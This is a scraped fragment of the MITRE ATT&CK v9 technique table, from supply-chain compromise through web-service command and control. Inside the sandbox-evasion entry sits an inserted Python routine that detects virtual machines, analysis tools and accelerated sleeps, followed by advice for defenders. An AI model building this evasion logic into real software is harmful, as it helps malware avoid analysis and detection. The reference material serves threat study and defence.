href="/versions/v9/techniques/T1195/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1195/002"> Compromise Software Supply Chain </a> </td> <td> Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. 
Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1195/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1195/003"> Compromise Hardware Supply Chain </a> </td> <td> Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1082"> T1082 </a> </td> <td> <a href="/versions/v9/techniques/T1082"> System Information Discovery </a> </td> <td> An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from <a href="/versions/v9/techniques/T1082">System Information Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1614"> T1614 </a> </td> <td> <a href="/versions/v9/techniques/T1614"> System Location Discovery </a> </td> <td> Adversaries may gather information in an attempt to calculate the geographical location of a victim host. 
Adversaries may use the information from <a href="/versions/v9/techniques/T1614">System Location Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1016"> T1016 </a> </td> <td> <a href="/versions/v9/techniques/T1016"> System Network Configuration Discovery </a> </td> <td> Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include <a href="/versions/v9/software/S0099">Arp</a>, <a href="/versions/v9/software/S0100">ipconfig</a>/<a href="/versions/v9/software/S0101">ifconfig</a>, <a href="/versions/v9/software/S0102">nbtstat</a>, and <a href="/versions/v9/software/S0103">route</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1016/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1016/001"> Internet Connection Discovery </a> </td> <td> Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using <a href="/versions/v9/software/S0097">Ping</a>, <code>tracert</code>, and GET requests to websites. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1049"> T1049 </a> </td> <td> <a href="/versions/v9/techniques/T1049"> System Network Connections Discovery </a> </td> <td> Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1033"> T1033 </a> </td> <td> <a href="/versions/v9/techniques/T1033"> System Owner/User Discovery </a> </td> <td> Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a>. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from <a href="/versions/v9/techniques/T1033">System Owner/User Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1007"> T1007 </a> </td> <td> <a href="/versions/v9/techniques/T1007"> System Service Discovery </a> </td> <td> Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using <a href="/versions/v9/software/S0057">Tasklist</a>, and "net start" using <a href="/versions/v9/software/S0039">Net</a>, but adversaries may also use other tools as well. Adversaries may use the information from <a href="/versions/v9/techniques/T1007">System Service Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1569"> T1569 </a> </td> <td> <a href="/versions/v9/techniques/T1569"> System Services </a> </td> <td> Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence (<a href="/versions/v9/techniques/T1543">Create or Modify System Process</a>), but adversaries can also abuse services for one-time or temporary execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1569/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1569/001"> Launchctl </a> </td> <td> Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like <a href="/versions/v9/techniques/T1543/001">Launch Agent</a>s and <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a>s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1569/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1569/002"> Service Execution </a> </td> <td> Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and <a href="/versions/v9/software/S0039">Net</a>. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1529"> T1529 </a> </td> <td> <a href="/versions/v9/techniques/T1529"> System Shutdown/Reboot </a> </td> <td> Adversaries may shut down/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer. Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1124"> T1124 </a> </td> <td> <a href="/versions/v9/techniques/T1124"> System Time Discovery </a> </td> <td> An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1080"> T1080 </a> </td> <td> <a href="/versions/v9/techniques/T1080"> Taint Shared Content </a> </td> <td> Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1221"> T1221 </a> </td> <td> <a href="/versions/v9/techniques/T1221"> Template Injection </a> </td> <td> Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are ZIP archives comprised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1205"> T1205 </a> </td> <td> <a href="/versions/v9/techniques/T1205"> Traffic Signaling </a> </td> <td> Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. <a href="/versions/v9/techniques/T1205/001">Port Knocking</a>), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1205/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1205/001"> Port Knocking </a> </td> <td> Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host-based firewall, but could also be implemented by custom software. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1537"> T1537 </a> </td> <td> <a href="/versions/v9/techniques/T1537"> Transfer Data to Cloud Account </a> </td> <td> Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1127"> T1127 </a> </td> <td> <a href="/versions/v9/techniques/T1127"> Trusted Developer Utilities Proxy Execution </a> </td> <td> Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process, which effectively bypasses application control solutions. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1127/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1127/001"> MSBuild </a> </td> <td> Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1199"> T1199 </a> </td> <td> <a href="/versions/v9/techniques/T1199"> Trusted Relationship </a> </td> <td> Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through a trusted third-party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1111"> T1111 </a> </td> <td> <a href="/versions/v9/techniques/T1111"> Two-Factor Authentication Interception </a> </td> <td> Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two- or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1552"> T1552 </a> </td> <td> <a href="/versions/v9/techniques/T1552"> Unsecured Credentials </a> </td> <td> Adversaries may search compromised systems to find and obtain insecurely stored credentials. 
These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. <a href="/versions/v9/techniques/T1552/003">Bash History</a>), operating system or application-specific repositories (e.g. <a href="/versions/v9/techniques/T1552/002">Credentials in Registry</a>), or other specialized files/artifacts (e.g. <a href="/versions/v9/techniques/T1552/004">Private Keys</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1552/001"> Credentials In Files </a> </td> <td> Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1552/002"> Credentials in Registry </a> </td> <td> Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1552/003"> Bash History </a> </td> <td> Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. 
Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1552/004"> Private Keys </a> </td> <td> Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1552/005"> Cloud Instance Metadata API </a> </td> <td> Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1552/006"> Group Policy Preferences </a> </td> <td> Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1552/007"> Container API </a> </td> <td> Adversaries may gather credentials via APIs within a container environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1535"> T1535 </a> </td> <td> <a href="/versions/v9/techniques/T1535"> Unused/Unsupported Cloud Regions </a> </td> <td> Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1550"> T1550 </a> </td> <td> <a href="/versions/v9/techniques/T1550"> Use Alternate Authentication Material </a> </td> <td> Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1550/001"> Application Access Token </a> </td> <td> Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1550/002"> Pass the Hash </a> </td> <td> Adversaries may "pass the hash" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1550/003"> Pass the Ticket </a> </td> <td> Adversaries may "pass the ticket" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1550/004"> Web Session Cookie </a> </td> <td> Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1204"> T1204 </a> </td> <td> <a href="/versions/v9/techniques/T1204"> User Execution </a> </td> <td> An adversary may rely upon specific actions by a user in order to gain execution. 
Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of <a href="/versions/v9/techniques/T1566">Phishing</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1204/001"> Malicious Link </a> </td> <td> An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from <a href="/versions/v9/techniques/T1566/002">Spearphishing Link</a>. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via <a href="/versions/v9/techniques/T1203">Exploitation for Client Execution</a>. Links may also lead users to download files that require execution via <a href="/versions/v9/techniques/T1204/002">Malicious File</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1204/002"> Malicious File </a> </td> <td> An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from <a href="/versions/v9/techniques/T1566/001">Spearphishing Attachment</a>. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1204/003"> Malicious Image </a> </td> <td> Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via <a href="/versions/v9/techniques/T1608/001">Upload Malware</a>, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1078"> T1078 </a> </td> <td> <a href="/versions/v9/techniques/T1078"> Valid Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1078/001"> Default Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1078/002"> Domain Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1078/003"> Local Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1078/004"> Cloud Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with a traditional identity management system, such as Windows Active Directory. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1125"> T1125 </a> </td> <td> <a href="/versions/v9/techniques/T1125"> Video Capture </a> </td> <td> An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially at specified intervals, in lieu of video files. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1497"> T1497 </a> </td> <td> <a href="/versions/v9/techniques/T1497"> Virtualization/Sandbox Evasion </a> </td> <td> Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. 
Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1497/001"> System Checks </a> </td> <td> Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1497/002"> User Activity Based Checks </a> </td> <td> Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. 
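<p> The T1497 entries describe three families of check without showing what one looks like. The following is an added example, not ATT&CK content and not code from any malware family: a small evasion routine of the kind an implant (or a red-team payload, or an analyst reproducing one) would run, covering system artifacts (T1497.001: hypervisor MAC prefixes, vendor strings, tiny CPU and memory budgets, analysis tooling processes), user-activity artifacts (T1497.002: recent documents, browser history, uptime) and a time-based check (T1497.003: whether a requested sleep actually elapsed, which it does not in sandboxes that hook the sleep call to speed up analysis). The checks run against a host profile dictionary so they can be exercised on constructed data; <code>collect_local_profile</code> gathers a partial real profile with the standard library only. The profiles, thresholds and process list are constructed for the example. </p>

```python
import os
import time
import uuid

# Well-known hypervisor OUI prefixes and vendor strings (illustrative table, not exhaustive).
VM_MAC_PREFIXES = {
    "00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware", "00:50:56": "VMware",
    "08:00:27": "VirtualBox", "00:15:5d": "Hyper-V", "00:16:3e": "Xen", "52:54:00": "QEMU/KVM",
}
VM_VENDOR_STRINGS = ("vmware", "virtualbox", "innotek", "qemu", "xen", "kvm", "bochs", "parallels")
ANALYSIS_PROCESSES = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe",
                      "procmon.exe", "wireshark.exe", "x64dbg.exe", "ollydbg.exe", "fiddler.exe"}


def _below(profile, key, limit):
    """True only when the field is present and under the limit; unknown fields never count."""
    return key in profile and profile[key] < limit


def system_indicators(profile):
    """T1497.001: artifacts of the virtual machine or analysis tooling itself."""
    hits = []
    if any(m.lower()[:8] in VM_MAC_PREFIXES for m in profile.get("macs", [])):
        hits.append("vm-mac-prefix")
    if _below(profile, "cpus", 2):
        hits.append("single-cpu")
    if _below(profile, "ram_gib", 2):
        hits.append("low-memory")
    vendor = profile.get("manufacturer", "").lower()
    if any(v in vendor for v in VM_VENDOR_STRINGS):
        hits.append("vm-vendor-string")
    if ANALYSIS_PROCESSES & {p.lower() for p in profile.get("processes", [])}:
        hits.append("analysis-process")
    return hits


def user_activity_indicators(profile):
    """T1497.002: a machine a person actually uses has history and has been up for a while."""
    hits = []
    if _below(profile, "recent_files", 5):
        hits.append("few-recent-files")
    if _below(profile, "browser_history", 20):
        hits.append("thin-browser-history")
    if _below(profile, "uptime_s", 600):
        hits.append("short-uptime")
    return hits


def sleep_was_accelerated(ms=200):
    """T1497.003: sandboxes that patch the sleep call return early; a monotonic clock exposes that."""
    start = time.perf_counter()
    time.sleep(ms / 1000)
    elapsed_ms = (time.perf_counter() - start) * 1000
    return elapsed_ms < 0.8 * ms


def looks_like_analysis_env(profile, threshold=3):
    """Combine the static indicators; a single hit is weak evidence, several together are not."""
    return len(system_indicators(profile)) + len(user_activity_indicators(profile)) >= threshold


def collect_local_profile():
    """Best-effort, stdlib-only profile of the host this runs on (MAC via uuid, uptime on Linux)."""
    node = uuid.getnode()
    mac = ":".join(f"{(node >> s) & 0xff:02x}" for s in range(40, -1, -8))
    profile = {"macs": [mac], "cpus": os.cpu_count() or 0}
    try:
        with open("/proc/uptime") as f:
            profile["uptime_s"] = float(f.read().split()[0])
    except OSError:
        pass  # not Linux, or /proc unavailable: leave uptime unknown rather than guessing
    return profile


# Constructed profiles: a default VirtualBox analysis VM and a used corporate workstation.
SANDBOX_PROFILE = {"macs": ["08:00:27:3e:2a:11"], "cpus": 1, "ram_gib": 1.0, "manufacturer": "innotek GmbH",
                   "processes": ["vboxservice.exe", "explorer.exe"], "recent_files": 0,
                   "browser_history": 3, "uptime_s": 240}
WORKSTATION_PROFILE = {"macs": ["3c:52:82:aa:bb:cc"], "cpus": 8, "ram_gib": 16.0, "manufacturer": "Dell Inc.",
                       "processes": ["explorer.exe", "outlook.exe", "chrome.exe"], "recent_files": 57,
                       "browser_history": 1400, "uptime_s": 3 * 86400}

if __name__ == "__main__":
    for name, p in (("sandbox", SANDBOX_PROFILE), ("workstation", WORKSTATION_PROFILE)):
        print(name, system_indicators(p), user_activity_indicators(p), looks_like_analysis_env(p))
    print("sleep accelerated:", sleep_was_accelerated(), "local:", collect_local_profile())
```

<p> For defenders the same table reads in reverse: a sandbox that gives its VMs more than one vCPU and a few gigabytes of memory, seeds recent-document and browser history, keeps the guest up for a while and does not short-circuit sleeps removes most of what this routine keys on. </p>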
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1497/003"> Time Based Evasion </a> </td> <td> Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1600"> T1600 </a> </td> <td> <a href="/versions/v9/techniques/T1600"> Weaken Encryption </a> </td> <td> Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1600/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1600/001"> Reduce Key Space </a> </td> <td> Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1600/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1600/002"> Disable Crypto Hardware </a> </td> <td> Adversaries may disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1102"> T1102 </a> </td> <td> <a href="/versions/v9/techniques/T1102"> Web Service </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1102/001"> Dead Drop Resolver </a> </td> <td> Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1102/002"> Bidirectional Communication </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. 
